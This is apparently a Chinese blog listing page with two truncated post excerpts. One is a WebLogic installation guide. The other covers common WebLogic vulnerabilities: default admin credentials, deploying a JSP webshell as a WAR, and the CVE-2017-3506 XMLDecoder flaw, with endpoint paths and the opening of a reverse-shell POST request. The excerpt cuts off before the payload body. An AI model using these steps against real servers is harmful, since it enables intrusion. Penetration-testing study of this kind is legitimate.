搜索内容

Weblogic

  • WebLogic常见的几种漏洞

    后台弱⼝令GetShell 漏洞描述 通过弱⼝令进⼊后台界⾯ , 上传部署war包 , getshell 影响范围 全版本(前提后台存在弱⼝令) 漏洞复现 默认账号密码:weblogic/Oracle@123 weblogic常⽤弱⼝令:https://cirt.net/passwords?criteria=weblogic 这⾥注意, 单个账号错误密码5次之后就会⾃动锁定。 1.登录后台后,点击部署,点击安装,点击上传⽂件。 2.上传war包,jsp⽊⻢压缩成zip,修改后缀为war,上传 访问部署好的木马文件,然后就哥斯拉连接。 (哥斯拉可以自动生成jsp木马文件,但是生成的木马文件尽量使用哥斯拉连接) CVE-2017-3506 XMLDecoder反序列化漏洞 漏洞描述 Weblogic的WLS Security组件对外提供了webserver服务,其中使⽤了XMLDecoder来解析⽤户输⼊的 XML数据,在解析过程中出现反序列化漏洞,可导致任意命令执⾏。 影响版本 受影响版本:WebLogic 10.3.6.0, 12.1.3.0, 12.2.1.1, 12.2.1.2。 漏洞复现 访问以下⽬录中的⼀种,有回显如下图可以判断wls-wsat组件存在 /wls-wsat/CoordinatorPortType /wls-wsat/RegistrationPortTypeRPC /wls-wsat/ParticipantPortType /wls-wsat/RegistrationRequesterPortType /wls-wsat/CoordinatorPortType11 /wls-wsat/RegistrationPortTypeRPC11 /wls-wsat/ParticipantPortType11 /wls-wsat/RegistrationRequesterPortType11 抓包,然后执行反弹shell的命令 POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1 Host: your ip:7001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: c……

    SE_Meng 2024-10-08
    21 0 0

  • Weblogic部署

    要安装weblogic,首先要有java环境,因此需要先安装jdk。 这里需要注意,weblogic版本不同,对应的jdk版本也不同,我在这里就踩了很多坑,我这里下载的是fmw_12.2.1.4.0_wls_lite_generic.jar对应的是jdk-8u333,而且jdk要从oracle官网下载,系统里自带的或者是安装的openjdk在安装时也会报错。 1. 安装jdk8 在官网 Java Archive | Oracle 下载好对应的版本,并将jdk安装包上传至服务器。 # 解压到/usr/local目录下 sudo tar -zxvf jdk-8u333-linux-x64.tar.gz -C /usr/local # 编辑 environment 文件 vim /etc/environment # JAVA_HOME= 后面是JDK安装目录,PATH在该文件中已经有了,我们只需在PATH中追加 :$JAVA_HOME/bin 即可 PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:$JAVA_HOME/bin" export CLASSPATH=.:$JAVA_HOME/lib:$JAVA_HOME/jre/lib export JAVA_HOME=/usr/local/jdk1.8.0_333 # 使改动立即生效 source /etc/environment # 编辑 profile 文件 vim /etc/profile # 追加如下内容,JAVA_HOME= 后面是JDK安装目录 export JAVA_HOME=/usr/local/jdk1.8.0_333 export JRE_HOME=$JAVA_HOME/jre export CLASSPATH=.:$JAVA_HOME/lib:$JRE_HOME/lib:$CLASSPATH export PATH=$JAVA_HOME/bin:$JRE_HOME/bin:$PATH # 使改动立即生效 source /etc/profile # 验证安装效果 执行 java -version 命令,控制台打印出JDK版本信息,说明安装成功。 参考文档: Ubuntu 手动安装 JDK8_ubuntu安装jdk8-CSDN博客 2. 安装weblogic Weblogic下载地址:WebLogic Server 12c (12.2.1), WebLogic Server 11g (10.3.6) and Previous Releases 2.1. 创建weblogic的安装目录 root用户安装weblogic是无法安装的,会报错,需要创建一个用户进行安装weblogic。 # 创建webl……

    SE_Meng 2024-09-25
    38 0 0